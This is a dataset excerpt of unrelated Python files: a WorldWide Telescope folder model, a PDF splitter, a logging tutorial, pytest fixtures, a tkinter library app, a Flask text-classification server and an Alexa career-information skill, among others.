Unicode(\"Explorer\").tag(xml=XmlSer.attr(\"Group\"))\n url = Unicode(\"\").tag(xml=XmlSer.attr(\"Url\"))\n \"\"\"The URL at which the full contents of this folder can be downloaded in WTML\n format.\n\n \"\"\"\n thumbnail = Unicode(\"\").tag(xml=XmlSer.attr(\"Thumbnail\"))\n browseable = Bool(True).tag(xml=XmlSer.attr(\"Browseable\"))\n searchable = Bool(True).tag(xml=XmlSer.attr(\"Searchable\"))\n type = UseEnum(\n FolderType,\n default_value=FolderType.UNSPECIFIED,\n ).tag(xml=XmlSer.attr(\"Type\"))\n sub_type = Unicode(\"\").tag(xml=XmlSer.attr(\"SubType\"))\n msr_community_id = Int(0).tag(xml=XmlSer.attr(\"MSRCommunityId\"), xml_omit_zero=True)\n \"\"\"The ID number of the WWT Community that this content came from.\"\"\"\n\n msr_component_id = Int(0).tag(xml=XmlSer.attr(\"MSRComponentId\"), xml_omit_zero=True)\n \"\"\"The ID number of this content item on the WWT Communities system.\"\"\"\n\n permission = Int(0).tag(xml=XmlSer.attr(\"Permission\"), xml_omit_zero=True)\n \"TBD.\"\n\n children = List(\n trait=Union(\n [\n Instance(\"wwt_data_formats.folder.Folder\", args=()),\n Instance(\"wwt_data_formats.place.Place\", args=()),\n Instance(\"wwt_data_formats.imageset.ImageSet\", args=()),\n ]\n ),\n default_value=(),\n ).tag(xml=XmlSer.inner_list())\n\n def _tag_name(self):\n return \"Folder\"\n\n def walk(self, download=False):\n yield (0, (), self)\n\n for index, child in enumerate(self.children):\n if isinstance(child, Folder):\n if not len(child.children) and child.url and download:\n url = child.url\n child = Folder.from_url(url)\n child.url = url\n self.children[index] = child\n\n for depth, path, subchild in child.walk(download=download):\n yield (depth + 1, (index,) + path, subchild)\n else:\n yield (1, (index,), child)\n\n def mutate_urls(self, mutator):\n if self.url:\n self.url = mutator(self.url)\n if self.thumbnail:\n self.thumbnail = mutator(self.thumbnail)\n\n for c in self.children:\n c.mutate_urls(mutator)\n\n def immediate_imagesets(self):\n \"\"\"\n Generate a sequence of the imagesets defined in this folder, without\n recursion into any child folders.\n\n Returns\n -------\n A generator of tuples of ``(child_index, item_type, imageset)``, described below.\n\n Notes\n -----\n In the generated tuples, ``child_index`` is the index number of the item\n within the folder's :attr:`~Folder.children` array and ``imageset`` is\n the :class:`~wwt_data_formats.imageset.ImageSet` object contained within\n the folder. If ``item_type`` is ``None``, that indicates that the\n imageset corresponds to an imageset child that is defined directly in\n the folder contents. It may also be a string indicating that the\n imageset is defined by a different kind of potential folder child.\n Allowed values are ``\"place_imageset\"``, ``\"place_foreground\"``, or\n ``\"place_background\"``, for different imagesets that may be contained\n within a :class:`~wwt_data_formats.place.Place` item in the folder.\n\n Examples\n --------\n Consider a folder that has two children: an imageset, and a place. The\n place in turn defines both a\n :attr:`~wwt_data_formats.place.Place.foreground_image_set` and a\n :attr:`~wwt_data_formats.place.Place.background_image_set`. The\n generator returned by this function will yield three values: ``(0, None,\n )``, ``(1, \"place_foreground\", )``, and ``(1,\n \"place_background\", )``.\n \"\"\"\n\n from .imageset import ImageSet\n from .place import Place\n\n for index, child in enumerate(self.children):\n if isinstance(child, ImageSet):\n yield (index, None, child)\n elif isinstance(child, Place):\n if child.image_set is not None:\n yield (index, \"place_imageset\", child.image_set)\n if child.foreground_image_set is not None:\n yield (index, \"place_foreground\", child.foreground_image_set)\n if child.background_image_set is not None:\n yield (index, \"place_background\", child.background_image_set)\n\n\ndef make_absolutizing_url_mutator(baseurl):\n \"\"\"Return a function that makes relative URLs absolute.\n\n Parameters\n ----------\n baseurl : string, absolute URL\n The absolute URL with which to combine relative URLs\n\n Returns\n -------\n A mutator function suitable for use with :meth:`wwt_data_formats.abcs.UrlContainer.mutate_urls`.\n\n Notes\n -----\n This function is designed for usage with :meth:`wwt_data_formats.abcs.UrlContainer.mutate_urls`.\n It returns a mutator function that can be passed to this method. The mutator will take\n relative URLs and make them absolute by combining them with the *baseurl* argument. Input URLs\n that are already absolute will be unchanged.\n\n \"\"\"\n from urllib.parse import urljoin, urlsplit\n\n def mutator(url):\n if not url:\n return url\n if urlsplit(url).netloc:\n return url # this URL is absolute\n return urljoin(baseurl, url)\n\n return mutator\n\n\ndef make_filesystem_url_mutator(basedir):\n \"\"\"Return a function that converts relative URLs to filesystem paths.\n\n Parameters\n ----------\n basedir : string, path\n An absolute path that the relative URLs will be combined with.\n\n Returns\n -------\n A mutator function suitable for use with\n :meth:`wwt_data_formats.abcs.UrlContainer.mutate_urls`.\n\n Notes\n -----\n This function is designed for usage with\n :meth:`wwt_data_formats.abcs.UrlContainer.mutate_urls`. It returns a mutator\n function that can be passed to this method. The mutator will take relative\n URLs and convert them to filesystem paths by combining them with the\n *basedir* argument. Input URLs that are absolute will be unchanged.\n\n \"\"\"\n from urllib.parse import unquote, urlsplit\n\n def mutator(url):\n if not url:\n return url\n\n split = urlsplit(url)\n if split.netloc:\n return url # this URL is absolute\n\n # TODO: this should work with '..' but pretty much only by luck\n return os.path.join(basedir, *(unquote(s) for s in split.path.split(\"/\")))\n\n return mutator\n\n\ndef _sanitize_name(name):\n s = re.sub(\"[^-_a-zA-Z0-9]+\", \"_\", name)\n s = re.sub(\"^_+\", \"\", s)\n s = re.sub(\"_+$\", \"\", s)\n return s\n\n\ndef fetch_folder_tree(root_url, root_cache_path, on_fetch=None):\n done_urls = set()\n\n def get_folder(url):\n if url in done_urls:\n return None, None\n\n if on_fetch is not None:\n on_fetch(url)\n resp = requests.get(url)\n resp.encoding = \"utf-8-sig\" # see LockedXmlTraits.from_url()\n elem = etree.fromstring(resp.text)\n done_urls.add(url)\n return resp.text, Folder.from_xml(elem)\n\n root_text, root_folder = get_folder(root_url)\n with open(os.path.join(root_cache_path, \"index.wtml\"), \"wt\", encoding=\"utf8\") as f:\n f.write(root_text)\n\n def walk(cur_folder, cur_cache_path):\n for index, child in enumerate(cur_folder.children):\n if not isinstance(child, Folder):\n continue\n\n text = None\n subdir_base = f\"{index:03d}_{_sanitize_name(child.name)}\"\n child_cache_path = os.path.join(cur_cache_path, subdir_base)\n\n if not len(child.children) and child.url:\n text, child = get_folder(child.url)\n if child is None:\n continue\n\n os.makedirs(child_cache_path, exist_ok=True)\n with open(\n os.path.join(child_cache_path, \"index.wtml\"), \"wt\", encoding=\"utf8\"\n ) as f:\n f.write(text)\n\n walk(child, child_cache_path)\n\n walk(root_folder, root_cache_path)\n\n\ndef walk_cached_folder_tree(root_cache_path):\n seen_urls = set()\n\n root_folder = Folder.from_file(os.path.join(root_cache_path, \"index.wtml\"))\n\n def walk(cur_treepath, cur_folder, cur_cache_path):\n yield (cur_treepath, cur_folder)\n\n for index, child in enumerate(cur_folder.children):\n child_treepath = cur_treepath + (index,)\n\n if not isinstance(child, Folder):\n yield (child_treepath, child)\n else:\n subdir_base = f\"{index:03d}_{_sanitize_name(child.name)}\"\n child_cache_path = os.path.join(cur_cache_path, subdir_base)\n\n if not len(child.children) and child.url:\n if child.url in seen_urls:\n continue\n\n seen_urls.add(child.url)\n child = Folder.from_file(\n os.path.join(child_cache_path, \"index.wtml\")\n )\n\n for sub_treepath, sub_child in walk(\n child_treepath, child, child_cache_path\n ):\n yield (sub_treepath, sub_child)\n\n for info in walk((), root_folder, root_cache_path):\n yield info\n","sub_path":"wwt_data_formats/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":10290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"261360591","text":"#! python3\r\n# splitPdf.py - big pdf -> some pages of that pdf\r\n# inputs: pdf file location, new name, new destination\r\n# outputs: new pdf with new name in new destination\r\n\r\nimport PyPDF2, os, sys, pprint, getpass, datetime\r\n\r\ndate = datetime.datetime.today()\r\nmonth = date.strftime(\"%B\")\r\nday = date.strftime(\"%d\")\r\npath = 'C:\\\\Users\\\\%s\\\\Desktop\\\\English Steward' % getpass.getuser()\r\nmaterials = path + '\\\\Materials'\r\n\r\ndef search(pdf):\r\n for folderName, subfolders, filenames in os.walk(materials):\r\n for filename in filenames:\r\n if filename == pdf:\r\n return os.path.join(folderName, filename)\r\n\r\n# Main\r\n\r\n# Student name\r\nprint('Student: ', end = '')\r\nname = input()\r\n\r\n# Pdf file\r\nprint('Pdf file name: ', end='')\r\npdf = input() + '.pdf'\r\nprint('Searching for: ' + pdf + '...')\r\nlocation = search(pdf) # returns abs path of the file\r\nif location:\r\n print('Found!')\r\nelse:\r\n print('File ' + pdf + ' not found in')\r\n print(materials)\r\n# Make directory to save the split pdf\r\ndest = path + '\\\\Students\\\\' + name + '\\\\' + month + '\\\\' + day\r\nif os.path.exists(dest) == False:\r\n os.makedirs(dest, exist_ok=True)\r\nos.chdir(dest)\r\nprint(os.getcwd())\r\n \r\n# How many?\r\nprint('Starting from: ', end='')\r\npageNum = int(input()) - 1\r\nprint('Number of pages: ', end='')\r\nnumOfPages = int(input())\r\n\r\n# open file in read binary mode\r\npdf = open(location, 'rb')\r\n\r\n# reader object\r\nreader = PyPDF2.PdfFileReader(pdf)\r\n\r\n# writer object\r\nwriter = PyPDF2.PdfFileWriter()\r\n\r\nfor i in range(numOfPages):\r\n # read page\r\n page = reader.getPage(pageNum + i)\r\n # write page\r\n writer.addPage(page)\r\n\r\n# output\r\noutputFile = open('%s %s Class Material.pdf' % (month, day), 'wb')\r\nwriter.write(outputFile)\r\n\r\n# close files\r\noutputFile.close()\r\npdf.close()\r\n","sub_path":"Split Pdf/splitPdf.py","file_name":"splitPdf.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"182927244","text":"# logging statements and how to log\n\n# this is the setup code for LOGGING in PYTHON\nimport logging\n\nlogging.basicConfig(filename='myProgramLog.txt', level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n# END SETUP CODE FOR LOGGING\nlogging.disable(logging.CRITICAL)\n\nlogging.debug('Start of program')\n\ndef factorial(n):\n logging.debug('Start of factorial(%s)' % (n))\n total = 1\n for i in range(1, n + 1):\n total *= i\n logging.debug('i is %s, total is %s' % (i, total))\n\n logging.debug('Return value is %s' % (total))\n return total\n\nprint(factorial(5))\n\nlogging.debug('End of program')\n\n# debug and critical are known as \"log level\"\n\n# debug is the first and lowest log level\n\n# info level\n\n# warning level\n\n# error level\n\n# critcal is the last and highest log level\n\n\n# logging to a text file\n# in order to log to text file instead of the console, you have to change the logging.basicConfig line\n# logging.basicConfig(filename='myProgramLog.txt', level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n","sub_path":"lesson36.py","file_name":"lesson36.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275243807","text":"# -*- coding: utf-8 -*-\n\"\"\"\ngdcdatamodel.test.conftest\n----------------------------------\n\npytest setup for gdcdatamodel tests\n\"\"\"\nimport pytest\nimport sqlalchemy\nfrom sqlalchemy.orm import sessionmaker\n\nfrom gdc_ng_models.models import (\n download_reports,\n qcreport,\n redaction,\n released_data,\n studyrule,\n)\nfrom gdc_ng_models.snacks import database as db\n\nSession = sessionmaker()\n\n\n@pytest.fixture(scope=\"session\")\ndef db_configs():\n return db.get_configs()\n\n\n@pytest.fixture(scope=\"session\")\ndef db_engine(db_configs):\n return db.postgres_engine_factory(db_configs)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_reports_db(db_engine):\n download_reports.Base.metadata.create_all(db_engine)\n yield\n download_reports.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_qcreport_db(db_engine):\n qcreport.Base.metadata.create_all(db_engine)\n yield\n qcreport.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_redaction_log_db(db_engine):\n redaction.Base.metadata.create_all(db_engine)\n yield\n redaction.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_study_rule_db(db_engine):\n studyrule.Base.metadata.create_all(db_engine)\n yield\n studyrule.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_released_data_db(db_engine):\n released_data.Base.metadata.create_all(db_engine)\n yield\n released_data.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"function\")\ndef db_session(db_engine):\n connection = db_engine.connect()\n transaction = connection.begin()\n session = Session(bind=connection)\n\n yield session\n\n session.close()\n transaction.rollback()\n connection.close()\n\n\n@pytest.fixture(scope=\"module\")\ndef db_module_session(db_engine):\n connection = db_engine.connect()\n transaction = connection.begin()\n session = Session(bind=connection)\n\n yield session\n\n session.close()\n transaction.rollback()\n connection.close()\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"532870281","text":"from poiskOtr_zolSech import *\nfrom sympy import *\nimport math\nimport copy\n\nx1,x2,x3,x4,l = symbols('x1 x2 x3 x4 l')\n\n\ndef getGrad(func):\n result = [diff(func,x1),diff(func,x2)]\n return result\n\n\ndef Gesse(grad):\n gesse=[]\n countArgs=len(grad)\n for i in range(0,countArgs):\n gesse.append([])\n for j in range(0,countArgs):\n gesse[i].append(diff(grad[i],'x'+str(j+1)))\n return gesse\n\ndef getValueFunc(func,point):\n if(len(point)==2):\n return func.subs({x1:point[0],x2:point[1]})\n if(len(point)==4):\n return func.subs({x1:point[0],x2:point[1],x3:point[2],x4:point[3]})\n\ndef getBestPoint(func, points):\n minValue=points[0]\n for i in range(0, len(points)):\n if(func.subs({x1:points[i][0],x2:points[i][1]}) 0):\n return getBestPoint(func, points)\n\n #print('\\n\\n\\n')\n print('--------------Искомая точка минимума-------------:\\n')\n print(curPoint)\n #print('\\n--------------Значение функции в точке минимума-------------:\\n')\n #print(getValueFunc(getStartFunc(indexFunc),curPoint))\n return curPoint\n\n","sub_path":"lab3_2/NewtonRafson.py","file_name":"NewtonRafson.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"96389153","text":"import pandas as pd\nimport numpy as np\nimport csv\nimport math\nimport sys\nimport matplotlib.pyplot as plt\nimport scipy.misc as smp\n\ndef parsingData(path):\n\tprint('=== parsing file from %s ===' % path)\n\tfilename = []\n\tnumber = -1\n\n\ttext = open(path, 'r', encoding = 'big5')\n\trows = csv.reader(text, delimiter = ',')\n\n\tfor r in rows:\n\t\tif number != -1:\n\t\t\tn_row = [float(t) for t in r[1].split(' ')]\n\t\t\tfilename.append(n_row)\n\t\tnumber += 1\t\n\n\tfilename = np.array(filename)\n\treturn filename\n\ndef parsingLabel(path):\n\tprint('=== generating label ===')\n\tfilename = pd.read_csv(path, usecols= ['label'] )\n\tfilename = np.array(filename)\n\treturn filename\n\ndef scaling(filename):\n filename = filename.reshape(filename.shape[0],48, 48,1)\n filename = filename.astype('float64')\n filename /= 255\n return filename\n\n# def plotting():\n \n\nif __name__ == '__main__':\n num = int(sys.argv[1])\n training_set = parsingData('data/train.csv')\n training_label = parsingLabel('data/train.csv')\n training_set = scaling(training_set)\n data = training_set[num].reshape((48,48))\n img = smp.toimage(data)\n img.resize((240,240))\n img.show()\n print(\"picture #%i is class#%i\" % (num, training_label[num]))\n\t\n","sub_path":"hw3/plotImage.py","file_name":"plotImage.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"265025646","text":"from django.shortcuts import render\r\nfrom hello import *\r\nfrom .forms import *\r\n\r\ndef function(request):\r\n form = MyForm()\r\n if request.method=='POST':\r\n form = MyForm(request.POST)\r\n if form.is_valid():\r\n x = int(form.data['x'])\r\n y = int(form.data['y'])\r\n return render(request, \"function.html\", {'form' : form , 'soma' : add(x , y)})\r\n return render(request, \"function.html\", {'form' : form ,'soma' : 0})\r\n\r\n\r\n\r\n","sub_path":"simple_project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"167482353","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nfrom PIL import ImageTk, Image \r\nfrom datetime import date\r\nimport datetime\r\nimport sqlite3\r\nimport sys\r\n\r\ndef exit():\r\n\tsys.exit()\r\n\r\n# Location of Database\r\ndatabase = \"C:/Users/91997/Desktop/FINAL PROJECT/library_data.db\"\r\n# Connecting Database\r\nglobal conn, cur\r\nconn = sqlite3.connect(database)\r\ncur = conn.cursor()\r\n\r\ndef check_issue(a, b):\r\n\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Book_data WHERE Book_Id = (?))\", (a,))\r\n\tdata1 = int(cur.fetchone()[0])\r\n\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Student_record WHERE Student_Id = (?))\", (b,))\r\n\tdata2 = int(cur.fetchone()[0])\r\n\tif (data1 == 1) and (data2 == 1):\r\n\t\tcur.execute(\"SELECT Token FROM Student_record WHERE Student_Id = (?)\", (b,))\r\n\t\ttoken = int(cur.fetchone()[0])\r\n\t\tcur.execute(\"SELECT Quantity FROM Book_data WHERE Book_Id = (?)\", (a,))\r\n\t\tquan = int(cur.fetchone()[0])\r\n\r\n\t\tif token == 3:\r\n\t\t\tmessagebox.showinfo(\"FULL\", \"You have already issued maximum number of books!\")\r\n\t\t\troot.destroy()\r\n\t\telif quan == 0:\r\n\t\t\tmessagebox.showinfo(\"OUT OF STOCK\", \"Book is currently unavailable!\")\r\n\t\t\troot.destroy()\r\n\t\telse:\r\n\t\t\tcur.execute(\"SELECT Book_name FROM Book_data WHERE Book_Id = (?)\", (a,))\r\n\t\t\tb_name = str(cur.fetchone()[0])\r\n\t\t\ttoday = date.today()\r\n\t\t\tcur.execute(\"SELECT Student_Id, Student_name FROM Student_record WHERE Student_Id = (?)\", (b,))\r\n\t\t\tdata = cur.fetchall()[0]\r\n\t\t\ts_id = int(data[0])\r\n\t\t\ts_name = str(data[1])\r\n\t\t\treissues = 0\r\n\t\t\tfine = 0.0\r\n\t\t\tif token == 0:\r\n\t\t\t\tcur.execute(\"INSERT INTO Book_1 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\tconn.commit()\r\n\t\t\telif token == 1:\r\n\t\t\t\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Book_1 WHERE Student_Id = (?))\", (s_id,))\r\n\t\t\t\tdata = int(cur.fetchone()[0])\r\n\t\t\t\tif data == 1:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_2 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\t\telse:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_1 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\telif token == 2:\r\n\t\t\t\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Book_1 WHERE Student_Id = (?))\", (s_id,))\r\n\t\t\t\tdata1 = int(cur.fetchone()[0])\r\n\t\t\t\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Book_2 WHERE Student_Id = (?))\", (s_id,))\r\n\t\t\t\tdata2 = int(cur.fetchone()[0])\r\n\t\t\t\tif data1 == 0:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_1 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\t\telif data2 == 0:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_2 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\t\telse:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_3 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\ttoken = token + 1\r\n\t\t\tquan -= 1\r\n\t\t\tcur.execute(\"UPDATE Student_record SET Token = (?) WHERE Student_Id = (?)\", (token, b,))\r\n\t\t\tconn.commit()\r\n\t\t\tcur.execute(\"UPDATE Book_data SET Quantity = (?) WHERE Book_Id = (?)\", (quan, a,))\r\n\t\t\tconn.commit()\r\n\t\t\tmessagebox.showinfo(\"ISSUED\", \"Book Issued Successfully!\")\r\n\t\t\troot.destroy()\r\n\r\n\r\n\telif data1 != 1:\r\n\t\tmessagebox.shoerror(\"NOT FOUND\", \"Book Not Found!\")\r\n\t\troot.destroy()\r\n\r\n\telif data2 != 1:\r\n\t\tmessagebox.shoerror(\"NOT FOUND\", \"Student Record Not Found!\")\r\n\t\troot.destroy()\r\n\r\ndef issue_book():\r\n\t# Creating Window\r\n\tglobal root\r\n\tglobal Canvas1\r\n\troot = Tk()\r\n\troot.title('LIBRARY')\r\n\tscreen_width = root.winfo_screenwidth() \r\n\tscreen_height = root.winfo_screenheight() \r\n\troot.geometry(str(screen_width) + \"x\" + str(screen_height))\r\n\r\n\tCanvas1 = Canvas(root) \r\n\tCanvas1.config(bg=\"black\",width = screen_width, height = screen_height)\r\n\tCanvas1.pack(expand=True,fill=BOTH)\r\n\r\n\t# Creating Heading\r\n\theading_frame = Frame(root, bg = \"#FFC433\", bd = 5)\r\n\theading_frame.place(relx=0.215,rely=0.05,relwidth=0.6,relheight=0.15)\r\n\theading = Label(heading_frame, text = \"Welcome To Library\", bg = \"black\", fg = \"white\", font = ('courier', 50, 'bold'))\r\n\theading.place(relx=0,rely=0, relwidth=1, relheight=1)\r\n\r\n\t# Button Frame\r\n\tlogin_frame_border = Frame(root, bg = \"#FFC433\", bd = 5)\r\n\tlogin_frame_border.place(relx = 0.215, rely = 0.25, relwidth = 0.6, relheight = 0.4)\r\n\tlogin_frame = Frame(login_frame_border, bg = \"black\")\r\n\tlogin_frame.place(relx = 0, rely = 0, relwidth = 1, relheight = 1)\r\n\r\n\tbook_id = Label(login_frame, text = \"Enter Book Id : \", bg = \"black\", fg = \"white\", font = ('courier', 20, 'bold'))\r\n\tbook_id.place(relx = 0.03, rely = 0.2, relwidth = 0.45, relheight = 0.2)\r\n\tb_id_entry = Entry(login_frame, bd = 5, bg = \"white\", font = ('courier', 20, 'bold'))\r\n\tb_id_entry.place(relx = 0.53, relwidth = 0.45, rely = 0.2, relheight = 0.2)\r\n\r\n\tstd_id = Label(login_frame, text = \"Enter Student Id : \", bg = \"black\", fg = \"white\", font = ('courier', 20, 'bold'))\r\n\tstd_id.place(relx = 0.03, rely = 0.6, relwidth = 0.45, relheight = 0.2)\r\n\ts_id_entry = Entry(login_frame, bd = 5, bg = \"white\", font = ('courier', 20, 'bold'))\r\n\ts_id_entry.place(relx = 0.53, relwidth = 0.45, rely = 0.6, relheight = 0.2)\r\n\r\n\t# print(by_name_entry.get(), by_author_entry.get())\r\n\r\n\tsubmit = Button(root, text = \"Issue Book\", bg = \"#FFC433\", fg = \"black\", bd = 5, font = ('courier', 20, 'bold'), command = lambda: check_issue(int(b_id_entry.get()), int(s_id_entry.get())))\r\n\tsubmit.place(relx = 0.375, rely = 0.8, relwidth = 0.25, relheight = 0.08)\r\n\r\n\tmain_menu = Button(root, text = \"Go To Main Menu\", bg = \"#FFC433\", fg = \"black\", bd = 5, font = ('courier', 20, 'bold'))\r\n\tmain_menu.place(relx = 0.1, rely = 0.8, relwidth = 0.25, relheight = 0.08)\r\n\r\n\tclose = Button(root, text = \"Close Application\", bg = \"#FFC433\", fg = \"black\", bd = 5, font = ('courier', 20, 'bold'), command = exit)\r\n\tclose.place(relx = 0.65, rely = 0.8, relwidth = 0.25, relheight = 0.08)\r\n\r\n\t# Closing Window\r\n\troot.mainloop()","sub_path":"FINAL PROJECT/issue_options.py","file_name":"issue_options.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"33100020","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nExample for how to scrape with http mode. This mode isn't quite as sophisticated as selenium mode.\n\"\"\"\n\nfrom GoogleScraper import scrape_with_config, GoogleSearchError\n\nif __name__ == '__main__':\n # See in the config.cfg file for possible values\n config = {\n 'SCRAPING': {\n 'keyword': 'python sucks',\n 'scrapemethod': 'http'\n },\n 'SELENIUM': {\n 'sel_browser': 'chrome',\n 'manual_captcha_solving': 'True'\n },\n 'GLOBAL': {\n 'do_caching': 'True',\n 'debug': '10',\n }\n }\n\n try:\n # scrape() and scrape_with_config() will return a handle to a sqlite database with the results\n db = scrape_with_config(config)\n print(db.execute('SELECT * FROM link').fetchall())\n\n except GoogleSearchError as e:\n print(e)\n\n\n","sub_path":"examples/raw_http_mode.py","file_name":"raw_http_mode.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"216106914","text":"# Author:duguiming\n# Description:对外提供接口服务\n# Date:2019-07-08\nimport json\nfrom predict import CNNModel\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\ncnn_model = CNNModel()\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n res = dict()\n if request.method == 'POST':\n data = request.get_data()\n json_data = json.loads(data.decode('utf-8'))\n line = json_data['text']\n pred_label = cnn_model.predict(line)\n res['code'] = 200\n res['msg'] = '成功'\n res['label'] = pred_label\n return jsonify(res)\n else:\n res['code'] = 405\n res['msg'] = \"请求方式错误,请换为POST请求\"\n return jsonify(res)\n\n\nif __name__ == \"__main__\":\n app.config['JSON_AS_ASCII'] = False\n app.run(debug=True, threaded=True, host='0.0.0.0', port=9095)\n","sub_path":"DL/TF_CNN_RNN/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"224773655","text":"\"\"\"\nTest module.\nRuns all tests.\n\"\"\"\n\nimport sys\nimport unittest\n\n\ndef main():\n exit_code = 0\n test_result = _run_test_suite('test', '*_test.py')\n\n if test_result.errors or test_result.failures:\n exit_code = 1\n\n sys.exit(exit_code)\n\n\ndef _run_test_suite(directory, pattern):\n loader = unittest.TestLoader()\n runner = unittest.TextTestRunner(verbosity=2)\n suite = loader.discover(directory, pattern)\n\n return runner.run(suite)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"152949036","text":"from __future__ import print_function\nimport urllib\nimport urllib2\nimport xml.etree.ElementTree\nimport os\nimport base64\n\n# -------------- Helpers for O*NET Web Services --------------------------------\n\ndef add_onet_authorization(req):\n auth_str = os.environ['onet_web_services_username'] + \\\n ':' + \\\n os.environ['onet_web_services_password']\n req.add_header('Authorization', 'Basic ' + \\\n base64.b64encode(auth_str))\n\ndef call_onet_service(path, params=None):\n url = 'https://services.onetcenter.org/ws/' + path\n if params is not None:\n url += '?' + urllib.urlencode(params)\n req = urllib2.Request(url)\n add_onet_authorization(req)\n response = urllib2.urlopen(req)\n return xml.etree.ElementTree.fromstring(response.read())\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_on_the_job_response(intent, session):\n \"\"\" Reads tasks from the requested career.\n \"\"\"\n\n card_title = intent['name']\n session_attributes = {}\n should_end_session = False\n\n if 'Career' in intent['slots'] and intent['slots']['Career']['value']:\n career_name = intent['slots']['Career']['value']\n \n search_res = call_onet_service('mnm/search', {'keyword': career_name})\n onet_code = search_res.find('career').find('code').text\n career_res = call_onet_service('mnm/careers/' + onet_code + '/')\n onet_title = career_res.find('title').text\n \n card_title = \"What \" + onet_title + \" do on the job\"\n speech_output = \"On the job, \" + onet_title + \" will:\"\n for task_el in career_res.find('on_the_job').findall('task'):\n speech_output += \" \" + task_el.text\n should_end_session = True\n else:\n speech_output = \"I didn't understand that career. \" \\\n \"Please try again.\"\n \n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to the O*NET Demo skill. \" \\\n \"Please ask me about a career by saying, \" \\\n \"what does an architect do?\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please ask me about a career by saying, \" \\\n \"what does an architect do?\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying the O*NET 